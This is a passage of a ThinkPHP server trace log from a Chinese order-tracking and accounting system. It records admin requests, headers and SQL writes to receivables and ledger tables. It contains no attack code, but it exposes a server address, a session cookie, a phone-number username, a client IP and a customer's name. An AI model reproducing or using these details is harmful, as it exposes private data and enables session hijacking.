factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,outbound.id AS outbound__id,outbound.number AS outbound__number,outbound.kehu_id AS outbound__kehu_id,outbound.total_money AS outbound__total_money,outbound.buildstaff_id AS outbound__buildstaff_id,outbound.staffinfo_id AS outbound__staffinfo_id,outbound.factorymge_id AS outbound__factorymge_id,outbound.complete_status AS outbound__complete_status,outbound.admin_id AS outbound__admin_id,outbound.is_print AS outbound__is_print,outbound.createtime AS outbound__createtime,outbound.updatetime AS outbound__updatetime FROM `ot_outboundandorder` `outboundandorder` LEFT JOIN `ot_orderinfo` `orderinfo` ON `outboundandorder`.`orderinfo_id`=`orderinfo`.`id` LEFT JOIN `ot_productinfo` `productinfo` ON `outboundandorder`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outboundandorder`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `outboundandorder`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_outbound` `outbound` ON `outboundandorder`.`outbound_id`=`outbound`.`id` WHERE `outbound`.`id` = '11825' [ RunTime:0.014685s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1515 LIMIT 1 [ RunTime:0.000534s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1129 LIMIT 1 [ RunTime:0.000294s ] [ sql ] [ SQL ] SELECT * FROM `ot_outbound` WHERE `id` = 11825 LIMIT 1 [ RunTime:0.000254s ] --------------------------------------------------------------- [ 2025-12-14T16:59:00+08:00 ] 106.112.204.117 GET /admin/ajax/lang?callback=define&controllername=financial.verifybill&v=1765702740 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=financial.verifybill&v=1765702740 [运行时间:0.031751s][吞吐率:31.50req/s] [内存消耗:3,850.14kb] [文件加载:71] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001168s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11825?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'financial.verifybill', 'v' => '1765702740', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001524s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000096s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:59:01+08:00 ] 106.112.204.117 POST /admin/staffmge/kehu/getfackehu [ info ] 47.105.33.115:8081/admin/staffmge/kehu/getfackehu [运行时间:0.048936s][吞吐率:20.43req/s] [内存消耗:5,010.32kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000046s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001195s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.kehu', 2 => 'getfackehu', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '158', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11825?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'searchTable' => 'tbl', 'searchKey' => 'id', 'searchValue' => '820', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'showField' => 'name', 'keyField' => 'id', 'keyValue' => '820', 'searchField' => array ( 0 => 'name', ), ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001563s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/kehu.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Kehu->getfackehu[ /alidata/www/gendan/application/admin/controller/staffmge/Kehu.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.007710s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000388s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000752s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_kehu` WHERE `id` IN (820) AND ( factorymge_id =40 ) LIMIT 1 [ RunTime:0.000378s ] [ sql ] [ SQL ] SELECT * FROM `ot_kehu` WHERE `id` IN (820) AND ( factorymge_id =40 ) ORDER BY `name` ASC LIMIT 0,20 [ RunTime:0.000272s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.000555s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"searchTable\":\"tbl\",\"searchKey\":\"id\",\"searchValue\":\"820\",\"orderBy\":[[\"name\",\"ASC\"]],\"showField\":\"name\",\"keyField\":\"id\",\"keyValue\":\"820\",\"searchField\":[\"name\"]}' , '/admin/staffmge/kehu/getfackehu' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.204.117' , 1765702741) [ RunTime:0.006172s ] --------------------------------------------------------------- [ 2025-12-14T16:59:34+08:00 ] 106.112.204.117 POST /admin/financial/verifybill/hedui/ids/11825?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11825?dialog=1 [运行时间:0.132743s][吞吐率:7.53req/s] [内存消耗:6,208.19kb] [文件加载:94] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001244s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'hedui', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '372', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11825?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'kehu_id' => array ( 0 => '向开林', 1 => '820', ), 'verify_amount' => array ( 0 => '10752', 1 => '10752', ), 'price' => array ( 0 => '1.53', 1 => '0.4700000000', ), 'money' => array ( 0 => '16450.56', 1 => '5053.4400000000', ), 'explain' => array ( 0 => '20W-5底壳1.210752个', 1 => '20W-5上盖跳步10752个', ), 'shoukuan_status-1' => '1', 'shoukuan_status-2' => '1', 'ids' => '11825', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001592s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->hedui[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.008489s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000533s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000875s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000544s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000606s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001070s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000926s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000314s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.000933s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.000894s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000656s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000631s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.000633s ] [ sql ] [ SQL ] SELECT `outboundandorder`.`id`,`outboundandorder`.`outbound_id`,`outboundandorder`.`orderinfo_id`,`outboundandorder`.`kehu_id`,`outboundandorder`.`amount`,`outboundandorder`.`money`,`outboundandorder`.`price`,`outboundandorder`.`productinfo_id`,`outboundandorder`.`factorymge_id`,`outboundandorder`.`staffinfo_id`,`outboundandorder`.`admin_id`,`outboundandorder`.`createtime`,`outboundandorder`.`updatetime`,`outboundandorder`.`verify_status`,`outboundandorder`.`verify_amount`,orderinfo.id AS orderinfo__id,orderinfo.nei_number AS orderinfo__nei_number,orderinfo.number AS orderinfo__number,orderinfo.pid AS orderinfo__pid,orderinfo.order_company AS orderinfo__order_company,orderinfo.order_connect AS orderinfo__order_connect,orderinfo.order_phone AS orderinfo__order_phone,orderinfo.kehu_id AS orderinfo__kehu_id,orderinfo.price AS orderinfo__price,orderinfo.material_id AS orderinfo__material_id,orderinfo.pProductinfo_id AS orderinfo__pProductinfo_id,orderinfo.productinfo_id AS orderinfo__productinfo_id,orderinfo.order_type AS orderinfo__order_type,orderinfo.order_status AS orderinfo__order_status,orderinfo.all_order_status AS orderinfo__all_order_status,orderinfo.shengchan_status AS orderinfo__shengchan_status,orderinfo.zuixinshuoming AS orderinfo__zuixinshuoming,orderinfo.guzhangshu AS orderinfo__guzhangshu,orderinfo.zuixinguzhang AS orderinfo__zuixinguzhang,orderinfo.techprocess_id AS orderinfo__techprocess_id,orderinfo.actual_amount AS orderinfo__actual_amount,orderinfo.kucun_amount AS orderinfo__kucun_amount,orderinfo.produce_amount AS orderinfo__produce_amount,orderinfo.produced_amount AS orderinfo__produced_amount,orderinfo.waste_amount AS orderinfo__waste_amount,orderinfo.produced_time AS orderinfo__produced_time,orderinfo.send_amount AS orderinfo__send_amount,orderinfo.ruku_posi AS orderinfo__ruku_posi,orderinfo.sent_amount AS orderinfo__sent_amount,orderinfo.out_time AS orderinfo__out_time,orderinfo.build_order_staffid AS orderinfo__build_order_staffid,orderinfo.factorymge_id AS orderinfo__factorymge_id,orderinfo.admin_id AS orderinfo__admin_id,orderinfo.remind_day AS orderinfo__remind_day,orderinfo.build_time AS orderinfo__build_time,orderinfo.end_time AS orderinfo__end_time,orderinfo.responsible_staffinfos AS orderinfo__responsible_staffinfos,orderinfo.responsible_staffinfovars AS orderinfo__responsible_staffinfovars,orderinfo.feedback AS orderinfo__feedback,orderinfo.guoqitime AS orderinfo__guoqitime,orderinfo.guoqi_status AS orderinfo__guoqi_status,orderinfo.put_position AS orderinfo__put_position,orderinfo.createtime AS orderinfo__createtime,orderinfo.updatetime AS orderinfo__updatetime,orderinfo.is_modify AS orderinfo__is_modify,orderinfo.purchaseorder_id AS orderinfo__purchaseorder_id,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,outbound.id AS outbound__id,outbound.number AS outbound__number,outbound.kehu_id AS outbound__kehu_id,outbound.total_money AS outbound__total_money,outbound.buildstaff_id AS outbound__buildstaff_id,outbound.staffinfo_id AS outbound__staffinfo_id,outbound.factorymge_id AS outbound__factorymge_id,outbound.complete_status AS outbound__complete_status,outbound.admin_id AS outbound__admin_id,outbound.is_print AS outbound__is_print,outbound.createtime AS outbound__createtime,outbound.updatetime AS outbound__updatetime FROM `ot_outboundandorder` `outboundandorder` LEFT JOIN `ot_orderinfo` `orderinfo` ON `outboundandorder`.`orderinfo_id`=`orderinfo`.`id` LEFT JOIN `ot_productinfo` `productinfo` ON `outboundandorder`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outboundandorder`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `outboundandorder`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_outbound` `outbound` ON `outboundandorder`.`outbound_id`=`outbound`.`id` WHERE `outbound`.`id` = '11825' [ RunTime:0.015332s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=10752,`price`=1.53,`money`=16450.56 WHERE `id` = 27800 [ RunTime:0.004778s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountsreceivable` [ RunTime:0.000816s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000292s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (820 , 40 , 53547 , 1515 , 11825 , 27800 , 1 , 2025 , 12 , 14 , '20W-5底壳1.210752个' , 1765702774 , 16450.56 , 11126131.550661) [ RunTime:0.004977s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000383s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `reced_money` , `yu_money`) VALUES (820 , 40 , 53547 , 1515 , 11825 , 27800 , 1 , 2025 , 12 , 14 , '20W-5底壳1.210752个' , 1765702774 , 16450.56 , 11109680.990661) [ RunTime:0.004091s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_ladger` [ RunTime:0.000785s ] [ sql ] [ SQL ] SELECT * FROM `ot_ladger` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000322s ] [ sql ] [ SQL ] INSERT INTO `ot_ladger` (`reced_money` , `yu_money` , `rece_id` , `subject_type` , `explain` , `factorymge_id` , `day` , `month` , `year` , `createtime`) VALUES (16450.56 , 945947.45891708 , 19843 , 5 , '20W-5底壳1.210752个' , 40 , 14 , 12 , 2025 , 1765702774) [ RunTime:0.005068s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=10752,`price`=0.47,`money`=5053.44 WHERE `id` = 27801 [ RunTime:0.004717s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000380s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (820 , 40 , 53548 , 1129 , 11825 , 27801 , 1 , 2025 , 12 , 14 , '20W-5上盖跳步10752个' , 1765702774 , 5053.44 , 11114734.430661) [ RunTime:0.005166s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000404s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `reced_money` , `yu_money`) VALUES (820 , 40 , 53548 , 1129 , 11825 , 27801 , 1 , 2025 , 12 , 14 , '20W-5上盖跳步10752个' , 1765702774 , 5053.44 , 11109680.990661) [ RunTime:0.004579s ] [ sql ] [ SQL ] SELECT * FROM `ot_ladger` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000489s ] [ sql ] [ SQL ] INSERT INTO `ot_ladger` (`reced_money` , `yu_money` , `rece_id` , `subject_type` , `explain` , `factorymge_id` , `day` , `month` , `year` , `createtime`) VALUES (5053.44 , 951000.89891708 , 19845 , 5 , '20W-5上盖跳步10752个' , 40 , 14 , 12 , 2025 , 1765702774) [ RunTime:0.004930s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.000740s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('跟单系统 财务管理 校对应收账款 核对' , '{\"dialog\":\"1\",\"kehu_id\":[\"\\u5411\\u5f00\\u6797\",\"820\"],\"verify_amount\":[\"10752\",\"10752\"],\"price\":[\"1.53\",\"0.4700000000\"],\"money\":[\"16450.56\",\"5053.4400000000\"],\"explain\":[\"20W-5\\u5e95\\u58f31.210752\\u4e2a\",\"20W-5\\u4e0a\\u76d6\\u8df3\\u6b6510752\\u4e2a\"],\"shoukuan_status-1\":\"1\",\"shoukuan_status-2\":\"1\",\"ids\":\"11825\"}' , '/admin/financial/verifybill/hedui/ids/11825?dialog=1' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.204.117' , 1765702774) [ RunTime:0.006586s ] --------------------------------------------------------------- [ 2025-12-14T16:59:35+08:00 ] 106.112.204.117 GET /admin/financial/verifybill/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22start_time%22%3A%222025-11-14+00%3A00%3A00%22%2C%22end_time%22%3A%222025-12-14+23%3A59%3A59%22%7D&op=%7B%22start_time%22%3A%22%3D%22%2C%22end_time%22%3A%22%3D%22%7D&_=1765701970990 [ info ] 47.105.33.115:8081/admin/financial/verifybill/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22start_time%22%3A%222025-11-14+00%3A00%3A00%22%2C%22end_time%22%3A%222025-12-14+23%3A59%3A59%22%7D&op=%7B%22start_time%22%3A%22%3D%22%2C%22end_time%22%3A%22%3D%22%7D&_=1765701970990 [运行时间:0.261851s][吞吐率:3.82req/s] [内存消耗:5,709.16kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000049s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001126s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'index', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{"start_time":"2025-11-14 00:00:00","end_time":"2025-12-14 23:59:59"}', 'op' => '{"start_time":"=","end_time":"="}', '_' => '1765701970990', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001585s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->index[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000136s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000435s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000890s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000371s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000789s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001281s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000852s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000309s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.000698s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000773s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.001030s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM ( SELECT `outbound`.`id`,`outbound`.`number`,`outbound`.`kehu_id`,`outbound`.`total_money`,`outbound`.`buildstaff_id`,`outbound`.`staffinfo_id`,`outbound`.`factorymge_id`,`outbound`.`complete_status`,`outbound`.`admin_id`,`outbound`.`is_print`,`outbound`.`createtime`,`outbound`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,outboundandorder.id AS outboundandorder__id,outboundandorder.outbound_id AS outboundandorder__outbound_id,outboundandorder.orderinfo_id AS outboundandorder__orderinfo_id,outboundandorder.kehu_id AS outboundandorder__kehu_id,outboundandorder.amount AS outboundandorder__amount,outboundandorder.money AS outboundandorder__money,outboundandorder.price AS outboundandorder__price,outboundandorder.productinfo_id AS outboundandorder__productinfo_id,outboundandorder.factorymge_id AS outboundandorder__factorymge_id,outboundandorder.staffinfo_id AS outboundandorder__staffinfo_id,outboundandorder.admin_id AS outboundandorder__admin_id,outboundandorder.createtime AS outboundandorder__createtime,outboundandorder.updatetime AS outboundandorder__updatetime,outboundandorder.verify_status AS outboundandorder__verify_status,outboundandorder.verify_amount AS outboundandorder__verify_amount,count(*) FROM `ot_outbound` `outbound` LEFT JOIN `ot_factorymge` `factorymge` ON `outbound`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outbound`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_outboundandorder` `outboundandorder` ON `outbound`.`id`=`outboundandorder`.`outbound_id` WHERE ( outbound.createtime > 1763049600 ) AND ( outbound.createtime <= 1765727999 ) AND `outboundandorder`.`verify_status` = 0 AND `outbound`.`factorymge_id` = '40' GROUP BY `outbound`.`id` 